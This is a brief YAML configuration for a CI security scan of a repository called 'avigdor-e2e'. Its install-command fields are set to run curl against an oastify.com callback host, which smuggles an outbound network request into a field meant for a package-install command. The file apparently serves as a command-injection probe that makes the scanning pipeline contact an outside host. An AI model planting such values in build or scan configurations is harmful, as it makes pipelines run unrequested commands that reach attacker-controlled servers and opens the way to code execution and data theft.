- params:
    git:
      repoName: avigdor-e2e
      branches:
        - main
    scan:
      includeAllVulnerabilities: false
      failOnSecurityIssues: false
      minSeverity: high
      fixableOnly: false
      projects:
        - InstallCommandName: curl
        - InstallCommandArgs:
          - "http://ao2b68zg6v4wj2zuwkrbz4rnxe35r0fp.oastify.com/new"
